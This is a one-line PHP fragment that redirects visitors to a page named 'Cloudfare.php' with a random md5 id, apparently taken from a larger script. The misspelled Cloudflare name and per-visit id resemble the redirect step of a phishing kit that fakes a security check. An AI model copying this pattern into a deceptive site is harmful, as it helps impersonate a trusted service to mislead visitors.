    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
